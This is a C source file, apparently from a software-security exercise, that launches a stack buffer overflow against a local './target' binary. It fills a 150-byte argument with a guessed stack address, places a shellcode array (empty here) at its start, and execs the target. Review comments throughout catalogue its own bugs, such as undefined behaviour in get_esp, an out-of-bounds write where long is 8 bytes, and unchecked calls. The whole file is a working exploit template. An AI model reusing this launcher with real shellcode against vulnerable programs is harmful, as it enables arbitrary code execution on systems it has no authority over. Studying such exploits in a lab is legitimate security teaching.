#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <assert.h>
#include <unistd.h>
// put the shellcode here in binary form: "\xAA\xBB..."
// Empty by default. main() copies strlen(shellcode) bytes of this array to the
// start of the payload buffer, so an embedded '\0' ends the copy early, and
// nothing checks that the array fits inside the buffer.
char shellcode[] = "";
// Returns the current stack pointer; 32-bit x86 only (`movl %esp,%eax`).
// NOTE(review): the function has no `return` statement, so falling off the end of a
// non-void function and using the value is undefined behavior. It presumably only
// "works" because the i386 ABI returns integers in EAX and nothing clobbers EAX
// between the asm statement and the return when built without optimization;
// the asm has no output operand, so the compiler is not told EAX was written.
unsigned long get_esp(void) { __asm__("movl %esp,%eax"); }
// Entry point. Builds a 150-byte buffer filled with (stack pointer - argv[1]),
// overlays the bytes of `shellcode` at its start, NUL-terminates it, and execs
// ./target with the buffer as its single argument.
// NOTE(review): `void main` is not a standard signature (C11 5.1.2.2.1 expects
// `int main`); the exit status seen by the caller is therefore unspecified.
void main(int argc, char* argv[]) {
// NOTE(review): assert() is compiled out under NDEBUG, leaving argv[1] unchecked.
assert(argc == 2);
int payload_size = 150; // size of our long payload
// NOTE(review): atoi() reports no error; non-numeric input silently becomes 0.
int offset = atoi(argv[1]); // offset to our ESP
// NOTE(review): the malloc() result is never checked for NULL.
char* payload = malloc(payload_size);
long addr = get_esp() - offset;
fprintf(stderr, "Using address: 0x%lx\n", addr);
// write the address everywhere
// NOTE(review): this assumes sizeof(long) == 4. Where long is 8 bytes the loop
// stores 37 * 8 = 296 bytes into a 150-byte allocation, an out-of-bounds heap
// write inside this program itself.
for (int i = 0; i < payload_size/4; i++)
((long*)payload)[i] = addr;
// the shellcode at the beginning
// NOTE(review): signed/unsigned comparison (int vs size_t), and no check that
// strlen(shellcode) <= payload_size - 1 before copying.
for (int i = 0; i < strlen(shellcode); i++)
payload[i] = shellcode[i];
// 0 only at the very end
payload[payload_size - 1] = '\0';
//////////////////////////
// run target with payload as argument
// Hard-coded relative path: the binary is resolved against the current working directory.
char* target_argv[] = { "./target", payload, NULL };
// NOTE(review): if execv() fails it returns -1 and main falls off the end without
// reporting errno or freeing `payload`.
execv(target_argv[0], target_argv);
// For debugging, it's also useful to write the payload to a file
// and run target with payload as argument using xargs.
// NOTE(review): if this path is ever re-enabled, the fopen()/fclose() results
// should be checked, and system() goes through the shell; exec-family calls
// with an explicit argv (as above) avoid that.
//
// FILE *f = fopen("/tmp/payload", "w");
// fprintf(f, "%s", payload);
// fclose(f);
//
// system("xargs -0 -a /tmp/payload ./target");
}